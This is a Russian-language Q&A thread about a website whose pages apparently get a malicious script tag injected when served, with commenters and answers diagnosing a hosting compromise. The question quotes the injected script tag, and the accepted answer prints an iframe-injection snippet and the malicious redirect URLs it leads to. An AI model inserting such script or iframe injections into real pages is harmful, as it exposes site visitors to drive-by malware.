# Мистика. Вредоносный код. JavaScript

Tags: javascript, безопасность

На хостинге все файлы чистые. Например index.php - содержащий только html. Но когда смотрю его в браузере, в head добавляется строка подключения вредоносного javascript кода:

```
<script language="JavaScript" src="http://igri2011.ru/wp-content/themes/game/js/jquery-1.6.5.min.js" type="text/javascript"></script>
```

Откуда он там берётся? :(

UPD.

У меня там облачный хостинг. Не VPS. Техподдержка пишет - "судя по всему ваш сайт взломали", но как? При чём тут сайт вообще? Все файлики чистенькие как слёзы ангела. :))) Скрытых файлов тоже нет.

Comment: igri2011.ru - это ваш сайт?

Comment: Сайт отмечен, как опасный в google (***На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.***), но yandex его определяет, как абсолютно нормальный. Как я вжу, это у вас Wordpress. А скачивали вы его с официального сайта? Или может быть какой-то плагин с левого сайта устанавливали?Сам же google, [рекоментует](https://support.google.com/websearch/answer/45449?rd=1) получить дополнительную информацию для решения проблемы на [StopBadware.org](https://www.stopbadware.org/webmaster-help)

Comment: @mountpoint нет, igri2011.ru - это не мой сайт, это сайт, с которого в мои странички как-то включается вредоносный код.

Comment: @Deonis мой сайт не на вордпрессе. Это этот вредоносный на вордпрессе. Это строка как-то добавляется в мои странички. :(

Comment: @Angelina_Jo хостинг какой? Так легко менять может только он?

Comment: А что в htaccess ? Все норм?

Comment: @ReinRaus Приветик. ))) Я там не использую .htaccess - его там нет вообще. :)

Comment: @Angelina_Jo у вас чисто хостинг или vps?

Comment: А как насчет того, что просто заражен компьютер у автора вопроса? Я даже помню случай, как друг на РОУТЕР! подцепил вирус, который в метрику встраивал баннеры.

Comment: тут тоже обсуждают
http://forum.searchengines.ru/showthread.php?t=804610


Answer (score 5, accepted):

> У меня там облачный хостинг. Не VPS. Техподдержка пишет - "судя по всему ваш сайт взломали", но как? При чём тут сайт вообще? Все файлики чистенькие как слёзы ангела. :))) Скрытых файлов тоже нет.\

Исходим от этого. Есть 2 варианта:

1. взломали сервера компании
2. сам хостинг подсовывает

Честно говоря пахнет целенаправленной атакой на вас. Если конечно у других пользователей нет тогоже самого.

В общем:

1. проверяем нет ли такой проблемы у других пользователей хостинга
2. требуем лог обращений к системе управления вашим хостингом. Если там есть не ваш ip - то взлом

p.s. ссылку на ваш сайт плиз

p.p.s. а вот и цель взломщиков (из того скрипта)

```
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://freemoviesbazaar.com/wp-content/uploads/2010/11/banner.php';
```

p.p.p.s. если подставить UA - opera, то с `http://freemoviesbazaar.com/wp-content/uploads/2010/11/banner.php` кидает на `http://vijrqqgpwywji.is-a-chef.com:8000/smhiqg?duliw=2766304`

p.p.p.p.s при firefox и ie поинтересней `http://vijrqqgpwywji.is-a-chef.com:8000/spgschbnwxbxxe?dylwbcjxml=2766304`

p.p.p.p.p.s. либо у вас ваш комп заражён

Comment: @lampa Нее. Другим же посетителям сайта гугл хром тоже кричит об опасности и код у них показывается тот же самый. :)

Comment: @Angelina_Jo ну вроде становится всё очевидно ;) Доказательства хостеру, пусть разбирается. Я бы еще месяц аренды попросил бесплатный. Даже потребовал бы.

Comment: @lampa Мне интересно, предложат ли они сами за свой косяк какие-нибудь плюшки. ))) Ну а вообще, урон репутации весомый, у меня там среди прочего интернет-магазин размещён. Пока что удалила самые посещяемые разделы, чтобы было "not found", вместо - "Опасность: обнаружено вредоносное ПО!", хотя, всё равно, наверное в гугл хроме про опасность пишется. Как от этого отмыться теперь?! :(

Comment: Итог: либо хак их серверов, либо они сами (вряд ли, но...). Закрывайте вопрос

Answer (score 0):

Это просто XSS. Ничего необычного. XSS-уязвимость подключает вредоносный скрипт. Данный вид атаки легко справляется с этой целью. Предыдуший ответ - неверный, и содержит в себе абсолютный бред.